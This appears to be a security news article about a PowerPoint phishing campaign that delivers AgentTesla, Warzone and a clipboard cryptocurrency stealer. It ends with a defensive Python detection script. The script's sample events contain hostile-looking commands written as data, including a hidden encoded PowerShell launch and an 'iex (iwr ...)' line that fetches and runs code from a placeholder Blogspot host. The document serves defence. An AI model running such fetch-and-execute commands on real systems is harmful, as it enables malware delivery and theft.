Since December 2021, fraudulent PowerPoint presentations have been used in phishing efforts to deliver several types of malware, notably remote access and information-stealing trojans. According to Netskope’s Threat Labs research, attackers are using PowerPoint files in conjunction with reputable cloud services to host malware payloads. Warzone (aka AveMaria) and AgentTesla are two formidable RATs and info-stealers that target various applications. The researchers also noted the dropping of bitcoin stealers in the monitored campaign.
The malicious PowerPoint phishing file contains an obfuscated macro that is run through PowerShell and MSHTA, both built-in Windows components. The VBS script is then de-obfuscated and adds new Windows registry entries for persistence, which leads to the execution of two further scripts: the first retrieves AgentTesla from an external URL, and the second turns off Windows Defender.
The VBS also creates a scheduled task that runs a script every hour, which pulls a PowerShell cryptocurrency stealer from a Blogger URL. AgentTesla is a .NET-based RAT (remote access trojan) that can collect browser passwords, log keystrokes, and capture clipboard contents, among other things. It is run via PowerShell and is lightly obfuscated, with a function that injects the payload into a running instance of "aspnet_compiler.exe".
Warzone, a RAT, is the second payload delivered in this campaign. However, Netskope doesn’t provide much information about it in the report. The cryptocurrency stealer is the campaign’s third payload, which compares clipboard data to cryptocurrency wallet patterns using a regex. If discovered, it substitutes the recipient’s address with one controlled by the actor. The stealer supports Bitcoin, Ethereum, XMR, DOGE, and other cryptocurrencies. On this GitHub page, Netskope has disclosed the whole list of IoCs (indicators of compromise) for this campaign, including all wallets used by the actors.
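As an added detection example (not code from the Netskope report or this article), the Python below flags the stages described above, PowerPoint spawning MSHTA/PowerShell, a Run-key value pointing at a script host, an hourly scheduled task that pulls PowerShell from a Blogger/Blogspot URL, and PowerShell launching aspnet_compiler.exe, over constructed, simplified Sysmon-style events. The event schema, the sample values and the placeholder URL are assumptions, not indicators from the campaign.

```python
import re

# Constructed sample telemetry (not from the report), in a simplified Sysmon-like
# schema: process creations, one registry value set, and one scheduled-task creation.
EVENTS = [
    {"type": "process", "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE",
     "Image": r"C:\Windows\System32\mshta.exe", "CommandLine": "mshta https://example.invalid/p"},
    {"type": "process", "ParentImage": r"C:\Windows\System32\mshta.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -ep bypass -enc QQBB"},
    {"type": "registry", "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\upd",
     "Details": r"wscript.exe C:\Users\u\AppData\Roaming\upd.vbs"},
    {"type": "task", "TaskName": r"\upd", "Interval": "PT1H",  # PT1H = hourly repetition trigger
     "Command": "powershell -c iex (iwr https://example-placeholder.blogspot.com/p/x.html)"},
    {"type": "process", "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", "CommandLine": "aspnet_compiler.exe"},
    {"type": "process", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"},  # benign control event
]

OFFICE = re.compile(r"\\(powerpnt|winword|excel)\.exe$", re.I)
HOST_IMAGE = re.compile(r"\\(mshta|powershell|pwsh|wscript|cscript)\.exe$", re.I)
HOST_CMD = re.compile(r"\b(mshta|powershell|pwsh|wscript|cscript)(\.exe)?\b", re.I)
RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", re.I)
FETCH = re.compile(r"\b(iwr|invoke-webrequest|downloadstring|iex|invoke-expression)\b", re.I)
BLOG = re.compile(r"https?://[^\s'\"]*\.(blogspot|blogger)\.com", re.I)

def rules_for(ev: dict) -> list[str]:
    """Names of the detection rules a single event matches (possibly none)."""
    hits = []
    if ev["type"] == "process":
        parent, image = ev["ParentImage"], ev["Image"]
        if OFFICE.search(parent) and HOST_IMAGE.search(image):
            hits.append("office_spawns_script_host")           # PowerPoint -> mshta/powershell
        if parent.lower().endswith("\\mshta.exe") and HOST_IMAGE.search(image):
            hits.append("mshta_spawns_script_host")            # mshta -> PowerShell stage
        if image.lower().endswith("\\aspnet_compiler.exe") and HOST_IMAGE.search(parent):
            hits.append("script_host_spawns_aspnet_compiler")  # injection target used by AgentTesla loader
    elif ev["type"] == "registry":
        if RUN_KEY.search(ev["TargetObject"]) and HOST_CMD.search(ev["Details"]):
            hits.append("run_key_script_persistence")          # Run value pointing at a script host/.vbs
    elif ev["type"] == "task":
        if ev.get("Interval") == "PT1H" and FETCH.search(ev["Command"]) and BLOG.search(ev["Command"]):
            hits.append("hourly_task_fetches_from_blog")       # hourly pull of the clipboard stealer
    return hits

def detect(events) -> list[tuple[int, str]]:
    """Run every rule over every event; returns (event index, rule name) pairs."""
    return [(i, r) for i, ev in enumerate(events) for r in rules_for(ev)]
```

Each rule is deliberately narrow; in production you would tune the Office parent list and the remote-fetch patterns to your environment and join the hits by host to surface the full chain.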